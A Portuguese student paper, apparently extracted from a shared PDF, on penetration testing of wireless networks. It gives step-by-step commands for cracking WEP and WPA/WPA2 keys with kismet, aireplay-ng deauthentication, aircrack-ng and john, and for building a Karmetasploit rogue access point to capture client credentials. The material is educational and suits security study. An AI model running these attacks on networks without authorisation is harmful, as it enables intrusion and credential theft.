Upload
mamute
View
24
Download
1
Embed Size (px)
DESCRIPTION
Pen-test é um método que avalia a segurança de um sistema de computador oude uma rede, simulando um ataque de uma fonte maliciosa. O processo envolve umaanálise nas atividades do sistema, que envolvem a busca de alguma vulnerabilidade empotencial que possa ser resultado de uma má configuração do sistema, falhas emhardwares/softwares desconhecidas, deficiência no sistema operacional ou técnicascontra medidas. Todas as análises submetidas pelos testes escolhidos são apresentadasno sistema, junto com uma avaliação do seu impacto e muitas vezes com uma propostade resolução ou de uma solução técnica.
Citation preview
1
PEN-TEST COM ÊNFASE EM REDES WLAN
Patrick Melo
Faculdade de Tecnologia de Teresina – CET
Teresina-PI-Brasil
Abstract. Currently the wireless networks have remarkable growth both in the
corporate environment and in captivity, but the safety issue is an aspect that
deserves special attention, as a medium, but it is something that is not
widespread. The identification and exploitation of the vulnerabilities of
wireless networks (WLAN) are contained within the concept of penetration
testing (Pen-Test), conceptually the PEN-TEST can also be defined as a set of
techniques that we use to perform safety test. Holding PEN-TEST becomes an
important mechanism to evaluate qualitatively and quantitatively even security
problems that may be encountered. Must be used within a security planning
methodology with well defined and concise.
Resumo. Atualmente as redes sem fio têm notável crescimento tanto em meio
corporativo quanto em meio doméstico, contudo o quesito segurança é um
aspecto que merece uma atenção especial, dado determinado meio, porém é
algo que não é amplamente difundido. A identificação e exploração das
vulnerabilidades das redes sem-fio (WLAN) estão contidas no âmbito do
conceito dos testes de penetração (Pen-Test), conceitualmente o PEN-TEST
também pode ser definido como um conjunto de técnicas que podemos utilizar
para realização de teste de segurança. A realização de PEN-TEST torna-se
um mecanismo importante para avaliar de forma qualitativa e até mesmo
quantitativa os problemas de segurança que venham a ser encontrados. Deve
ser utilizado dentro de um planejamento de segurança bem definido e com
metodologia concisa.
Palavras-Chave: Redes, Wireless, Criptografia, Invasão, Internet, Pen-Test.
1. Introdução
O surgimento do serviço sem fio começou no século XIX, onde “o pai do rádio”
Guglielmo Marconi deu os primeiros passos fazendo testes em ondas de rádio, onde
criou a primeira fábrica de rádio de todo o mundo, que se chamava Wireless Telegraph
and Signal Company Limited. Já em 1901 aconteceu de receber sinais do outro lado do
atlântico, e em 1905 foi utilizado o código morse. Alguns anos após, surgiu então a
ALOHANET que foi a primeira rede de pacotes que usava rádio frequência no início dos
anos 70, era uma rede baseada em um terminal central que distribuía as mensagens, que
utilizava a topologia em estrela e fazia uso de CSMA.
Com essa nova tecnologia, o IEEE (Institute of Electrical and Eletronics
Engineers) constituiu um grupo de pesquisa para criar padrões abertos e tornar a
2
tecnologia sem fio cada vez mais presente. O projeto denominado de Padrão IEEE
802.11, nasceu em 1990, mas ficou inerte por aproximadamente sete anos devido a
fatores que não permitiam que a tecnologia sem fio saísse do papel. Um dos principais
fatores era a baixa taxa de transferência de dados que inicialmente a tecnologia oferecia,
que era entre 860Kbps à 2Mbps.
No decorrer do tempo a rede sem fio começou a ser vista como uma tecnologia
promissora e a receber ainda mais investimentos para a construção de equipamentos que
possibilitassem a comunicação sem fio entre computadores. Atualmente o foco das
redes de computadores sem fio (Wireless) se encontra no contexto das redes locais de
computadores (Wireless Local Area Network - WLAN), tanto em soluções proprietárias
como no padrão do IEEE. Primeiramente foram colocados em prática alguns padrões
proprietários, através de empresas como IBM, CISCO, Telecom e 3COM. Hoje essas e
outras empresas baseiam seus produtos no padrão do IEEE, devido às inúmeras e já
conhecidas vantagens que o padrão aberto oferece: interoperabilidade, baixo custo,
demanda de mercado, confiabilidade de projeto, entre outras. O padrão IEEE 802.11
define basicamente uma arquitetura para as WLANs que abrange os níveis: físico e
de enlace. No nível físico são tratadas apenas as transmissões com freqüência de rádio
(RF) e infravermelho (IR), embora outras formas de transmissão sem fio possam ser
usadas, como microondas e laser, por exemplo. No nível de enlace, o IEEE definiu um
protocolo de controle de acesso ao meio (protocolo MAC), bastante semelhante ao
protocolo usado em redes locais Ethernet (CSMA/CD).
2. Pen-Test
Quando se fala em segurança devem-se fazer algumas perguntas: Seguro contra o que?
Seguro contra quem? Seguro em que condições? Segurança pode ser definido como
dificultar ou impedir a ocorrência de eventos indesejáveis. A segurança da informação
consiste na proteção de um conjunto de dados a fim de preservar o valor que o mesmo
possui para um determinado indivíduo ou organização.
Entre diversos objetivos a segurança trata alguns princípios básicos que são:
Confidencialidade – Consiste em proteger a informação contra leitura e cópia
por alguém sem a devida autorização do proprietário da informação. Em redes de
computadores significa que no tráfego dos dados nenhuma informação poderá ser vista,
alterada ou capturada.
Autenticidade – Consiste na veracidade do emissor e receptor de informações
trocadas, geralmente implementada a partir de um mecanismo de senhas ou assinatura
digital.
Integridade - Consiste em proteger a informação contra modificação sem a
permissão explícita do proprietário daquela informação.
Disponibilidade - Consiste na proteção dos serviços prestados pelo sistema de
forma que eles não sejam degradados ou se tornem indisponíveis sem autorização,
assegurando ao usuário o acesso aos dados sempre que deles precisar.
3
Pen-test é um método que avalia a segurança de um sistema de computador ou
de uma rede, simulando um ataque de uma fonte maliciosa. O processo envolve uma
análise nas atividades do sistema, que envolvem a busca de alguma vulnerabilidade em
potencial que possa ser resultado de uma má configuração do sistema, falhas em
hardwares/softwares desconhecidas, deficiência no sistema operacional ou técnicas
contra medidas. Todas as análises submetidas pelos testes escolhidos são apresentadas
no sistema, junto com uma avaliação do seu impacto e muitas vezes com uma proposta
de resolução ou de uma solução técnica.
3. Quebrando Criptografia Wep
Neste artigo para quebra de criptografia WEP será utilizado o kismet, aireplay-ng e
aircrak-ng.
O Kismet é uma ferramenta passiva que trata a busca de informações e captura de
pacotes de uma determinada rede. Quando executada, sua interface de rede é
automaticamente inserida em modo promíscuo.
Usando o sistema operacional Ubuntu 9.10, o primeiro passo para se usar o
kismet é baixar o pacote e depois deve-se configurar o mesmo de acordo com o driver de
sua interface de rede, o arquivo de configuração é o “/etc/kismet/kismet.conf”.
Na linha “source=none,none,addme” altere para seguinte forma onde o primeiro
none é o driver usado pela sua placa de rede e segundo none é a sua interface e addme é
um apelido qualquer que pode-se dar a interface de rede.Quando o comando “kismet” é
executado em um terminal, você terá acesso a seguinte interface.
Figura 1. Visualização das redes
#apt-get install kismet
4
Pressione a tecla “backspace” e em seguida a tecla “s” e depois “b”, e selecione a
rede “alvo”, para obter informações sobre a rede “alvo” pressione a tecla “enter”.
Figura 2. Informações da rede alvo
Para efetuar a captura de pacotes devemos selecionar a rede “alvo” e ativar a
tecla “caps lock” e em seguida digitar “shift+l” para que o KISMET comece a captura.
Figura 3. Captura de pacotes
5
Agora para injetar tráfego na rede deve-se colocar a interface em modo
promíscuo no canal da rede alvo, onde wlan2 refere-se a interface de rede e 5 o canal
utilizado pela rede alvo, para isso utilizamos o seguinte comando:
Utilize a ferramenta aireplay-ng para a injeção de tráfego na rede. O aireplay-ng
faz parte da suíte aircrack-ng. Para injetar tráfego na rede “alvo” é necessário obter
informações como o BSSID do AP alvo e endereço físico de sua interface de rede,
obtendo essa informação é só executar o seguinte comando em outro terminal:
Onde 00:02:6F:61:DE:0B é o BSSID e o 00-1F-1F-13-0E-52 é o endereço físico
de sua interface de rede ou de algum cliente conectado.
Figura 4. Injeção de tráfego na rede
Os pacotes capturados pelo kismet se encontram no diretório “/var/log/kismet/”,
onde o arquivo utilizado para a descriptografar é o arquivo “Kismet-data-do-
teste.dump”.
#aireplay-ng -3 -b 00:02:6F:61:DE:0B -h 00-1F-1F-13-0E-52 wlan2
#airmon-ng start wlan2 5
#apt-get install aircrack-ng
6
Para a descriptografia utilize o aircrack-ng, Com outro terminal entre no
diretório onde se encontram os pacotes capturados, em seguida execute a ferramenta
selecionando a rede alvo.
Figura 5. Selecionando a rede alvo
Em seguida será iniciado processo de descriptografia.
Figura 6. Descriptografando
#cd /var/log/kismet
#aircrack-ng <nome_do_arquivo.dump>
7
4. Quebrando Criptografia WPA/WPA2
Na criptografia wpa, serão necessárias mais algumas ferramentas, contudo capture o
handshake e use-o para a descriptografia juntamente com ferramentas de força bruta ou
wordlists.
Para dar inicio a quebra da criptografia, utilize novamente o kismet, pelo
terminal, e identifique todas as informações precisas da rede, tais como SSID, BSSID,
tipo de chave, canal utilizado dentre outras.
Figura 7. Informações da rede alvo
8
Para visualizar os clientes que se encontram conectados à rede, pressione a tecla
“c”.
Figura 8. Clientes da rede alvo
Após a visualização dos clientes conectados, selecione um endereço mac de um
cliente conectado para forçar a desautenticação seguida da captura dos handshakes, com
os comandos a seguir:
Usando ataque de força bruta:
#airmon-ng start <interface de rede> <canal>
#airodump-ng -w <nome do arquivo> -c <canal> <interface>
#aireplay-ng -0 1 -a <MAC DO AP> -c <MAC DO CLIENTE> <interface de rede>
#john -incremental=digits --stdout | aircrack-ng -b <MAC DO ACCESS POINT> -w -
<NOME DO ARQUIVO.cap>
9
Figura 9. Resultado do ataque de força bruta
Usando Wordlist e mesclando com o john:
Figura 10. Resultado do ataque usando wordlist
Existem também outros tipos de ferramentas de ataque customizado que exigem
um pouco mais de conhecimento do atacante.
Neste caso será usada a distribuição Back track v4 que contém a suíte de
ferramentas Metasploit Framework, que conta com mais de 500 exploits para
exploração de vulnerabilidades, onde a escolhida foi o “Karma” que é um conjunto de
#john --stdout --incremental:all | aircrack-ng -b <MAC DO ACCESS POINT> -w -
<NOME DO ARQUIVO*.cap>
10
ferramentas para avaliar a segurança de clientes das redes sem fio em várias camadas, e
pode-se capturar credenciais ou explorar vulnerabilidades do lado do cliente no host.
Pré-Requisitos:
Você precisa ter a suíte aircrack-ng instalada, consulte http://www.aircrack-
ng.org/doku.php?id=install_aircrack
Karmetasploit requer um banco de dados back-end para estar no lugar antes que
ele possa ser usado, isso pode ser conseguido através da execução:
Figura 11. Instalação
Configuração Inicial:
A primeira coisa que precisamos é configurar um servidor dhcp, em
“/etc/dhcpd/dhcpd.conf”,
# gem install sqlite3-ruby activerecord
11
Figura 12. Configuração DHCP
Após a configuração do servidor dhcp devemos iniciar o serviço através do
comando a seguir:
Em seguida, atualize o banco de exploits do Metasploit, para isso entre no
diretório /pentest/exploits/framework3.
Agora crie uma nova interface de modo monitor virtual:
Obs: Isso irá criar um modo de interface mon0 monitor, use iwconfig para confirmar.
Agora crie o novo ponto de acesso:
# /etc/init.d/dhcp3-server start
# cd / pentest/exploits/framework3
# svn update
# airmon-ng start wlan0
# airbase-ng –c 11 –P -C 30 --essid "linksys"-v mon0
12
Figura 13. Criando um ponto de acesso
- c = canal
- P = responda a todas as sondas e cria falsos SSID’S
- C 30 = permitir balizamento de valores sondados ESSID (em segundos)
-- essid = especificar um único ESSID
mon0 = interface de modo monitor virtual
Adicione um ip a uma interface virtual através do comando:
Edite o arquivo dhcp3-server que se encontra no diretório abaixo para que a
distribuição dos ips seja apenas pela interface at0
INTERFACES="at0"
Logo após entre no diretório “/pentest/exploits/framework3” para atualizar o
banco do metasploit e rode o karmetasploit.
# ifconfig at0 10.0.0.1 netmask 255.255.255.0 up
# vim /etc/default/dhcp3-server
13
Figura 14. Usando o Metasploit
5. Técnicas utilizadas
Network Scanning (varreduras);
Vulnerability Scanning (análises de vulnerabilidades);
Password Cracking (bruteforce);
Log Review (análise de logs);
Mitm Test (análise a partir da LAN);
War Driving (teste em sistema Wireless LAN);
Warchalking (teste em sistema Wireless LAN);
# . /msfconsole –r karma.rc
#svn update
14
6. Técnicas Intrusivas
Exploração de vulnerabilidades conhecidas nos serviços identificados;
Exploração de Vulnerabilidades em aplicações Web;
Técnicas de Bruteforce para serviços e Cracking de Senhas;
Testes de Negação de Serviço (DOS);
Escalada de Privilégios;
7. Conclusão
Em geral, é comum encontrar redes sem fio desprovidas de segurança e passíveis de
serem facilmente invadidas, comprometendo assim toda a rede, onde atualmente toda a
informação digital tem um valor imensurável para o meio coorporativo, sendo que ter
seus dados capturados por um atacante é algo que pode gerar danos irreparáveis e fazer
um pen-test é algo a ser considerado para identificar as possíveis vulnerabilidades da
rede e as possibilidades de invasão. As redes sem fio são muito atraentes devido a sua
facilidade e comodidade, todavia o quesito segurança deve estar em primeiro lugar.
8. Referências
How Wi-Fi Works. Disponível em <http://computer.howstuffworks.com/wireless-
network.htm>. Acessado em 30.04.2010.
Novas Tecnologias de Redes. Disponível em
<http://www.guiadohardware.net/tutoriais/061/>. Acessado em 10.04.2010.
Entendendo (e quebrando) a Segurança em Redes Wireless. Disponível em
<http://www.guiadohardware.net/tutoriais/121/>. Acessado em 16.04.2010.
Plano de Atribuição, Destinação e Distribuição de Faixas de Freqüências no Brasil.
Disponível em
<http://www.anatel.gov.br/Tools/frame.asp?link=/biblioteca/planos/plano_atribuicao_2
006.pdf>. Acessado em 15.04.2010.
<http://www.ieee.org> Acessado em 11.04.2010
Guerrini, I. M., Luz: Fundamentos teóricos. Disponível
em<http://educar.sc.usp.br/otica/luz.htm>. Acessado em 08.05.2010.
<http://www.dec.ufcg.edu.br>. Acessado em 15.05.2010